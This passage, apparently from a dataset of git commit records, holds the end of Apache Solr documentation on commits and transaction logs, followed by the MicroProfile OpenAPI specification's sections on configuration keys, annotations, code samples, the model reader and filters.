number of milliseconds to wait before activating.\n\nIf both of these parameters are specified, the first one to expire is honored. Generally, it is preferred to use `maxTime` rather than `maxDocs`, especially when indexing large numbers of documents in batches. Use `maxDocs` and `maxTime` judiciously to fine-tune your commit strategies.\n\nHard commit has an additional parameter, `openSearcher`.\n\n`openSearcher`::\ntrue|false, whether to make documents visible for search. 
For NRT applications this is usually set to `false` and `soft commit` is configured to control when documents are visible for search.\n\n=== Transaction Logs (tlogs)\n\nTransaction logs are a \"rolling window\" of updates since the last hard commit. The current transaction log is closed and a new one opened each time any variety of hard commit occurs. Soft commits have no effect on the transaction log.\n\nWhen tlogs are enabled, documents being added to the index are written to the tlog before the indexing call returns to the client. In the event of an un-graceful shutdown (power loss, JVM crash, `kill -9`, etc.) any documents written to the tlog but not yet committed with a hard commit when Solr was stopped are replayed on startup. Therefore the data is not lost.\n\nWhen Solr is shut down gracefully (using the `bin\/solr stop` command) Solr will close the tlog file and index segments so no replay will be necessary on startup.\n\nOne point of confusion is how much data is contained in a tlog. A tlog does not contain all documents, just the ones since the last hard commit. There are some low-level details involving `peer sync` that also involve the tlogs that are not relevant to this discussion. Older tlogs are deleted when no longer needed.\n\nWARNING: Implicit in the above is that transaction logs will grow forever if hard commits are disabled. Therefore it is important that hard commits be enabled when indexing.\n\n=== Configuring commits\n\nAs mentioned above, it is usually preferable to configure your commits (both hard and soft) in solrconfig.xml and avoid sending commits from an external source. Check your `solrconfig.xml` file since the defaults are likely not tuned to your needs. Here is an example NRT configuration for the two flavors of commit, a hard commit every 60 seconds and a soft commit every 30 seconds. Note that these are _not_ the values in some of the examples!\n\n[source,xml]\n----\n<autoCommit>\n <maxTime>${solr.autoCommit.maxTime:60000}<\/maxTime>\n <openSearcher>false<\/openSearcher>\n<\/autoCommit>\n\n<autoSoftCommit>\n <maxTime>${solr.autoSoftCommit.maxTime:30000}<\/maxTime>\n <\/autoSoftCommit>\n----\n\nTIP: These parameters can be overridden at run time by defining Java \"system variables\", for example specifying `-Dsolr.autoCommit.maxTime=15000` would override the hard commit interval with a value of 15 seconds.\n\nThe choices for `autoCommit` (with `openSearcher=false`) and `autoSoftCommit` have different consequences. In the event of un-graceful shutdown, it can take up to the time specified in `autoCommit` for Solr to replay the uncommitted documents from the transaction log.\n\nThe time chosen for `autoSoftCommit` determines the maximum time after a document is sent to Solr before it becomes searchable and does not affect the transaction log. Choose as long an interval as your application can tolerate for this value, often 15-60 seconds is reasonable, or even longer depending on the requirements. In situations where the time is set to a very short interval (say 1 second), consider disabling your caches (queryResultCache and filterCache especially) as they will have little utility.\n\nTIP: For extremely high bulk indexing, especially for the initial load if there is no searching, consider turning off `autoSoftCommit` by specifying a value of `-1` for the maxTime parameter.\n\n== Advanced Options\n\nAll varieties of commits can be invoked from a SolrJ client or via a URL. The usual recommendation is to _not_ call commits externally. 
For those cases where it is desirable, see <<uploading-data-with-index-handlers.adoc#xml-update-commands,Update Commands>>. These options are listed for XML update commands that can be issued from a browser or curl etc and the equivalents are available from a SolrJ client.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a5f7430e08fe2570eebc94cf954567cecca71e6","subject":"Fixing format","message":"Fixing format\n\nSigned-off-by: Arthur De Magalhaes <59d841a66e711472460ddee2e788b052b3849e47@gmail.com>\n","repos":"arthurdm\/microprofile-open-api","old_file":"spec\/src\/main\/asciidoc\/microprofile-openapi-spec.adoc","new_file":"spec\/src\/main\/asciidoc\/microprofile-openapi-spec.adoc","new_contents":"\/\/\n\/\/ Copyright (c) 2017 Contributors to the Eclipse Foundation\n\/\/\n\/\/ See the NOTICE file(s) distributed with this work for additional\n\/\/ information regarding copyright ownership.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n\n:sectanchors:\n:doctype: book\n:license: Apache License v2.0\n:source-highlighter: coderay\n:sectnums:\n:toc: left\n:toclevels: 4\nifdef::backend-pdf[]\n:pagenums:\nendif::[]\n\n= MicroProfile OpenAPI Specification\n\ninclude::license-alv2.asciidoc[]\n\n\n== Introduction\nExposing APIs has become an essential part of all modern applications. At the\ncenter of this revolution known as the API Economy we find RESTful APIs, which can\ntransform any application into language agnostic services that can be called from\nanywhere: on-premises, private cloud, public cloud, etc.\n\nFor the clients and providers of these services to connect there needs to be a\nclear and complete contract. Similar to the WSDL contract for legacy Web Services,\nthe https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md[OpenAPI v3] specification is the contract for\nRESTful Services.\n\nThis MicroProfile specification, called OpenAPI 1.0, aims to provide a set of Java\ninterfaces and programming models which allow Java developers to natively produce\nOpenAPI v3 documents from their JAX-RS applications.\n\n== Architecture\n\nThere are different ways to augment a JAX-RS application in order to produce an\nOpenAPI document, which are described in <<Documentation Mechanisms>>. 
The picture\nbelow provides a quick overview of the different types of components that make up\nthe MP OpenAPI specification:\n\n:imagesdir: images\nimage::diagram.png[Architecture Diagram]\n\nThe remaining sections of this specification will go into the details of each component.\n\n== Configuration\n\nConfiguration of various parts of this specification is provided via the https:\/\/github.com\/eclipse\/microprofile-config[MicroProfile Config] mechanism,\nwhich means that vendors implementing the MP OpenAPI specification must also implement\nthe MP Config specification.\n\nThere are various ways to inject these configuration values into an MP OpenAPI\nframework, including the https:\/\/github.com\/eclipse\/microprofile-config\/blob\/master\/spec\/src\/main\/asciidoc\/configsources.asciidoc#default-configources[default ConfigSource] as well as a\nhttps:\/\/github.com\/eclipse\/microprofile-config\/blob\/master\/spec\/src\/main\/asciidoc\/configsources.asciidoc#custom-configsources[custom ConfigSource].\n\nVendors implementing the MP OpenAPI specification can optionally provide additional native\nways for these configuration values to be injected into the framework\n(e.g. via a server configuration file), as long as they also implement the MP Config\nspecification.\n\n\n=== List of configurable items\n\nVendors must support all the <<Core configurations>> of this specification.\nOptionally, they may also support <<Vendor extensions>> that allow the configuration of\nframework-specific values for configurations that affect implementation behavior.\n\nFor the convenience of vendors (and application developers using custom ConfigSources),\nthe full list of supported configuration keys is available as constants in the\nhttps:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASConfig.java[OASConfig] class.\n\n==== Core configurations\n\nThe following is a list of configuration values that every vendor must support.\n\n[cols=\"1,4\"]\n|===\n| Config key | Value description\n\n| `mp.openapi.model.reader` | Configuration property to specify the fully qualified name of the <<OASModelReader>> implementation.\n| `mp.openapi.filter` | Configuration property to specify the fully qualified name of the <<OASFilter>> implementation.\n| `mp.openapi.scan.disable` | Configuration property to disable annotation scanning. Default value is `false`.\n| `mp.openapi.scan.packages` | Configuration property to specify the list of packages to scan. For example,\n`mp.openapi.scan.packages=com.xyz.PackageA,com.xyz.PackageB`\n| `mp.openapi.scan.classes` | Configuration property to specify the list of classes to scan. For example,\n`mp.openapi.scan.classes=com.xyz.MyClassA,com.xyz.MyClassB`\n| `mp.openapi.scan.exclude.packages` | Configuration property to specify the list of packages to exclude from scans. For example,\n`mp.openapi.scan.exclude.packages=com.xyz.PackageC,com.xyz.PackageD`\n| `mp.openapi.scan.exclude.classes` | Configuration property to specify the list of classes to exclude from scans. For example,\n`mp.openapi.scan.exclude.classes=com.xyz.MyClassC,com.xyz.MyClassD`\n| `mp.openapi.servers` | Configuration property to specify the list of global servers that provide connectivity information. For example,\n`mp.openapi.servers=https:\/\/xyz.com\/v1,https:\/\/abc.com\/v1`\n| `mp.openapi.servers.path.` | Prefix of the configuration property to specify an alternative list of servers to service all operations in a path. For example,\n`mp.openapi.servers.path.\/airlines\/bookings\/{id}=https:\/\/xyz.io\/v1`\n| `mp.openapi.servers.operation.` | Prefix of the configuration property to specify an alternative list of servers to service an operation.\nOperations that want to specify an alternative list of servers must define an `operationId`, a unique string used to identify the operation. For example,\n`mp.openapi.servers.operation.getBooking=https:\/\/abc.io\/v1`\n|===\n
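\nFor illustration, a `META-INF\/microprofile-config.properties` that sets a few of the keys above might contain the following (values taken from the examples in the table):\n\n[source,properties]\n----\nmp.openapi.scan.exclude.packages=com.xyz.PackageC,com.xyz.PackageD\nmp.openapi.servers=https:\/\/xyz.com\/v1,https:\/\/abc.com\/v1\n----\n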
\n==== Vendor extensions\n\nVendors that wish to provide vendor-specific configuration via MP Config (instead\nof another native configuration framework) must use the prefix `mp.openapi.extensions`.\n\n== Documentation Mechanisms\n\nThere are many different ways to provide input for the generation of the resulting\nOpenAPI document.\n\nThe MP OpenAPI specification requires vendors to produce a valid OpenAPI document\nfrom pure JAX-RS 2.0 applications. This means that vendors must process all the\nrelevant JAX-RS annotations (such as `@Path` and `@Consumes`) as well as Java objects\n(POJOs) used as input or output to JAX-RS operations. This is a good place to\nstart for application developers who are new to OpenAPI: just deploy your existing\nJAX-RS application into an MP OpenAPI vendor and check out the output from `\/openapi`!\n\nThe application developer then has a few choices:\n\n1. Augment those JAX-RS annotations with the\nOpenAPI <<Annotations>>. Using annotations means\ndevelopers don't have to rewrite the portions of the OpenAPI document that are\nalready covered by the JAX-RS framework (e.g. the HTTP method of an operation).\n\n2. Take the initial output from `\/openapi` as a starting point to document\nyour APIs via <<Static OpenAPI files>>. It's worth mentioning that these static\nfiles can also be written before any code, which is an approach often adopted by\nenterprises that want to lock in the contract of the API. In this case, we refer\nto the OpenAPI document as the \"source of truth\", by which the client and provider\nmust abide.\n\n
3. Use the <<Programming model>> to provide a bootstrap (or complete)\nOpenAPI model tree.\n\nAdditionally, a <<Filter>> is described which can update the OpenAPI model after it has\nbeen built from the previously described documentation mechanisms.\n\n=== Annotations\n\nMany of these OpenAPI v3 annotations were derived from the https:\/\/github.com\/swagger-api\/swagger-core[Swagger Core] library, which\nallows for a mostly-mechanical transformation of applications that are using that\nlibrary and wish to take advantage of the official MP OpenAPI interfaces.\n\n==== Quick overview of annotations\n\nThe following annotations are found in the https:\/\/github.com\/eclipse\/microprofile-open-api\/tree\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations[org.eclipse.microprofile.openapi.annotations] package.\n\n[cols=\"1,4\"]\n|===\n| Annotation | Description\n\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/Callback.java[@Callback] | Represents a callback URL that will be invoked.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/Callbacks.java[@Callbacks] | Represents an array of Callback URLs that can be invoked.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/CallbackOperation.java[@CallbackOperation] | Represents an operation that will be invoked during the callback.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/Components.java[@Components] | A container that holds various reusable objects for different aspects of the OpenAPI Specification.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/Explode.java[@Explode] | Enumeration used to define the value of the `explode` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/ParameterIn.java[@ParameterIn] | Enumeration representing the parameter's `in` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/ParameterStyle.java[@ParameterStyle] | Enumeration for the parameter's `style` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/SecuritySchemeIn.java[@SecuritySchemeIn] | Enumeration for the security scheme's `in` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/SecuritySchemeType.java[@SecuritySchemeType] | Enumeration for the security scheme's `type` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/extensions\/Extension.java[@Extension] | Adds an extension with contained properties.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/extensions\/Extensions.java[@Extensions] | Adds custom 
properties to an extension.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/ExternalDocumentation.java[@ExternalDocumentation] | References an external resource for extended documentation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/headers\/Header.java[@Header] | Describes a single header object.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/Contact.java[@Contact] | Contact information for the exposed API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/Info.java[@Info] | This annotation encapsulates metadata about the API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/License.java[@License] | License information for the exposed API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/links\/Link.java[@Link] | Represents a design-time link for a response.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/links\/LinkParameter.java[@LinkParameter] | Represents a parameter to pass to the linked operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Content.java[@Content] | Provides schema and examples for a particular media type.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/DiscriminatorMapping.java[@DiscriminatorMapping] | Used to differentiate between other schemas which may satisfy the payload description.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Encoding.java[@Encoding] | Single encoding definition to be applied to single Schema Object.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/ExampleObject.java[@ExampleObject] | Illustrates an example of a particular content.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Schema.java[@Schema] | Allows the definition of input and output data types.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/OpenAPIDefinition.java[@OpenAPIDefinition] | General metadata for an OpenAPI definition.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/Operation.java[@Operation] | Describes an operation or typically a HTTP method against a specific path.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/Parameter.java[@Parameter] | Describes a single operation parameter.\n| 
https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/Parameters.java[@Parameters] | Encapsulates input parameters.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/RequestBody.java[@RequestBody] | Describes a single request body.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/response\/APIResponse.java[@APIResponse] | Describes a single response from an API operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/response\/APIResponses.java[@APIResponses] | A container for multiple responses from an API operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthFlow.java[@OAuthFlow] | Configuration details for a supported OAuth Flow.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthFlows.java[@OAuthFlows] | Allows configuration of the supported OAuth Flows.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthScope.java[@OAuthScope] | Represents an OAuth scope.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirement.java[@SecurityRequirement] | Specifies a security requirement for an operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirements.java[@SecurityRequirements] | Represents an array of security requirements where only one needs to be satisfied.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirementsSet.java[@SecurityRequirementsSet] | Represents an array of security requirements that need to be satisfied.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityScheme.java[@SecurityScheme] | Defines a security scheme that can be used by the operations.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecuritySchemes.java[@SecuritySchemes] | Represents an array of security schemes that can be specified.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/Server.java[@Server]| Represents a server used in an operation or used by all operations in an OpenAPI document.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/Servers.java[@Servers] | A container for multiple server definitions.\n| 
https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/ServerVariable.java[@ServerVariable] | Represents a server variable for server URL template substitution.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/tags\/Tag.java[@Tag] | Represents a tag for the API endpoint.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/tags\/Tags.java[@Tags] | A container of multiple tags.\n|===\n\n==== Detailed usage of key annotations\n\n===== Operation\n\n.Sample 1 - Simple operation description\n[source,Java]\n----\n@GET\n@Path(\"\/findByStatus\")\n@Operation(summary = \"Finds Pets by status\",\n description = \"Multiple status values can be provided with comma separated strings\")\npublic Response findPetsByStatus(...) { ... }\n----\n\n.Output for Sample 1\n[source, yaml]\n----\n\/pet\/findByStatus:\n get:\n summary: Finds Pets by status\n description: Multiple status values can be provided with comma separated strings\n operationId: findPetsByStatus\n----\n\n.Sample 2 - Operation with different responses\n[source,Java]\n----\n@GET\n@Path(\"\/{username}\")\n@Operation(summary = \"Get user by user name\")\n@APIResponse(description = \"The user\",\n content = @Content(mediaType = \"application\/json\",\n schema = @Schema(implementation = User.class)))\n@APIResponse(responseCode = \"400\", description = \"User not found\")\npublic Response getUserByName(\n @Parameter(description = \"The name that needs to be fetched. Use user1 for testing. \", required = true) @PathParam(\"username\") String username)\n {...}\n----\n\n.Output for Sample 2\n[source, yaml]\n----\n\/user\/{username}:\n get:\n summary: Get user by user name\n operationId: getUserByName\n parameters:\n - name: username\n in: path\n description: 'The name that needs to be fetched. Use user1 for testing. '\n required: true\n schema:\n type: string\n responses:\n default:\n description: The user\n content:\n application\/json:\n schema:\n $ref: '#\/components\/schemas\/User'\n 400:\n description: User not found\n----\n\n\n===== RequestBody\n\n\n.Sample 1 - Simple RequestBody\n[source,Java]\n----\n@POST\n@Path(\"\/user\")\n@Operation(summary = \"Create user\",\n description = \"This can only be done by the logged in user.\")\npublic Response methodWithRequestBody(\n @RequestBody(description = \"Created user object\", required = true,\n content = @Content(schema = @Schema(implementation = User.class))) User user,\n @QueryParam(\"name\") String name, @QueryParam(\"code\") String code)\n { ... 
}\n----\n\n.Output for Sample 1\n[source, yaml]\n----\npost:\n summary: Create user\n description: This can only be done by the logged in user.\n operationId: methodWithRequestBody\n parameters:\n - name: name\n in: query\n schema:\n type: string\n - name: code\n in: query\n schema:\n type: string\n requestBody:\n description: Created user object\n content:\n '*\/*':\n schema:\n $ref: '#\/components\/schemas\/User'\n required: true\n responses:\n default:\n description: no description\n----\n\n===== Servers\n\n.Sample 1 - Extended Server scenarios\n[source,Java]\n----\n@OpenAPIDefinition(\n servers = {\n @Server(\n description = \"definition server 1\",\n url = \"http:\/\/{var1}.definition1\/{var2}\",\n variables = {\n @ServerVariable(name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"}),\n @ServerVariable(name = \"var2\",\n description = \"var 2\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})})\n@Server(\n description = \"class server 1\",\n url = \"http:\/\/{var1}.class1\/{var2}\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"}),\n @ServerVariable(\n name = \"var2\",\n description = \"var 2\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\n@Server(\n description = \"class server 2\",\n url = \"http:\/\/{var1}.class2\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\npublic class ServersResource {\n\n @GET\n @Path(\"\/\")\n @Server(\n description = \"method server 1\",\n url = \"http:\/\/{var1}.method1\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\n @Server(\n description = \"method server 2\",\n url = \"http:\/\/method2\"\n )\n public Response getServers() {\n return Response.ok().entity(\"ok\").build();\n }\n}\n----\n\n.Output for Sample 1\n[source, yaml]\n----\nopenapi: 3.0.0\nservers:\n- url: http:\/\/{var1}.definition1\/{var2}\n description: definition server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n var2:\n description: var 2\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\npaths:\n \/:\n get:\n operationId: getServers\n responses:\n default:\n description: default response\n servers:\n - url: http:\/\/{var1}.class1\/{var2}\n description: class server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n var2:\n description: var 2\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/{var1}.class2\n description: class server 2\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/{var1}.method1\n description: method server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/method2\n description: method server 2\n variables: {}\n----\n\n===== Schema\n\n.Sample 1 - Schema POJO\n[source,Java]\n----\n@Schema(name=\"MyBooking\", description=\"POJO that represents a booking.\")\npublic class Booking {\n @Schema(required = true, example = \"32126319\")\n private String airMiles;\n\n @Schema(required = true, example = \"window\")\n private String seatPreference;\n}\n----\n\n.Output for Sample 1\n[source, yaml]\n----\ncomponents:\n schemas:\n MyBooking:\n description: POJO that represents a booking.\n required:\n - airMiles\n - seatPreference\n type: 
object\n properties:\n airMiles:\n type: string\n example: \"32126319\"\n seatPreference:\n type: string\n example: window\n----\n\n\n.Sample 2 - Schema POJO reference\n[source,Java]\n----\n@POST\npublic Response createBooking(\n @RequestBody(description = \"Create a new booking.\",\n content = @Content(mediaType = \"application\/json\",\n schema = @Schema(implementation = Booking.class))) Booking booking) {\n----\n\n.Output for Sample 2\n[source, yaml]\n----\npost:\n operationId: createBooking\n requestBody:\n description: Create a new booking.\n content:\n application\/json:\n schema:\n $ref: '#\/components\/schemas\/MyBooking'\n----\n\n\nFor more samples please see the https:\/\/github.com\/eclipse\/microprofile-open-api\/wiki[MicroProfile Wiki].\n\n=== Static OpenAPI files\n\nApplication developers may wish to include a pre-generated OpenAPI document that\nwas written separately from the code (e.g. with an editor such as https:\/\/editor.swagger.io\/[this]).\n\nDepending on the scenario, the document may be fully complete or partially complete.\nIf a document is fully complete then the application developer will want to set the\n`mp.openapi.scan.disable` configuration property to `true`. If a document is partially\ncomplete, then the application developer will need to augment the OpenAPI snippet\nwith annotations, programming model, or via the filter.\n\n==== Location and formats\n\nVendors are required to fetch a single document named `openapi` with an extension\nof `yml`, `yaml` or `json`, inside the application's `META-INF` folder. If there\nis more than one document found that matches one of these extensions, the behavior\nof which file is chosen is undefined (i.e. each vendor may implement their own logic),\nwhich means that application developers should only place a single `openapi` document\ninto that folder.\n\n=== Programming model\n\nApplication developers are able to provide OpenAPI elements via Java POJOs. The\ncomplete set of models is found in the https:\/\/github.com\/eclipse\/microprofile-open-api\/tree\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/models[org.eclipse.microprofile.openapi.models] package.\n\n==== OASFactory\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASFactory.java[OASFactory] is used to create all of the elements of an OpenAPI tree.\n\nFor example, the following snippet creates a simple https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/models\/info\/Info.java[Info] element that contains a title, description, and version.\n\n[source,java]\n----\nOASFactory.createObject(Info.class).title(\"Airlines\").description(\"Airlines APIs\").version(\"1.0.0\");\n----\n\n==== OASModelReader\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASModelReader.java[OASModelReader] interface allows application developers to bootstrap the OpenAPI model tree\nused by the processing framework. To use it, simply create an implementation of\nthis interface and register it using the `mp.openapi.model.reader` configuration\nkey, where the value is the fully qualified name of the reader class.\n\n.Sample META-INF\/microprofile-config.properties\n[source,properties]\n----\nmp.openapi.model.reader=com.mypackage.MyModelReader\n----\n\nSimilar to static files, the model reader can be used to provide either complete\nor partial model trees. If providing a complete OpenAPI model tree, application\ndevelopers should set the `mp.openapi.scan.disable` configuration to `true`.\nOtherwise this partial model will be used as the base model during the processing\nof the other <<Documentation Mechanisms>>.\n\nVendors are required to call the OASModelReader a single time, in the order defined by\nthe <<Processing rules>> section. Only a single OASModelReader instance is allowed per\napplication.\n
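\nFor illustration, a minimal reader matching the sample configuration above might look like the following sketch (the model it builds is only an example; any partial tree can be returned):\n\n[source,java]\n----\npackage com.mypackage;\n\nimport org.eclipse.microprofile.openapi.OASFactory;\nimport org.eclipse.microprofile.openapi.OASModelReader;\nimport org.eclipse.microprofile.openapi.models.OpenAPI;\nimport org.eclipse.microprofile.openapi.models.info.Info;\n\npublic class MyModelReader implements OASModelReader {\n\n    @Override\n    public OpenAPI buildModel() {\n        \/\/ Bootstrap a partial model; the other documentation mechanisms\n        \/\/ can still contribute to it during processing\n        return OASFactory.createObject(OpenAPI.class)\n                .info(OASFactory.createObject(Info.class)\n                        .title(\"Airlines\")\n                        .description(\"Airlines APIs\")\n                        .version(\"1.0.0\"));\n    }\n}\n----\n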
\n=== Filter\n\nThere are many scenarios where application developers may wish to update or remove\ncertain elements and fields of the OpenAPI document. This is done via a filter,\nwhich is called once after all other documentation mechanisms have completed.\n\n==== OASFilter\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASFilter.java[OASFilter] interface allows application developers\nto receive callbacks for various key OpenAPI elements. The interface has a default\nimplementation for every method, which allows application developers to only override\nthe methods they care about. To use it, simply create an implementation of\nthis interface and register it using the `mp.openapi.filter` configuration\nkey, where the value is the fully qualified name of the filter class.\n\n.Sample META-INF\/microprofile-config.properties\n[source,properties]\n----\nmp.openapi.filter=com.mypackage.MyFilter\n----\n\nVendors are required to call all registered filters in the application (0..N) once\nfor each filtered element. For example, the method `filterPathItem` is\ncalled *for each* corresponding `PathItem` element in the model tree. This allows\napplication developers to filter the element and any of its descendants.\n\nThe order of filter methods called is undefined, with two 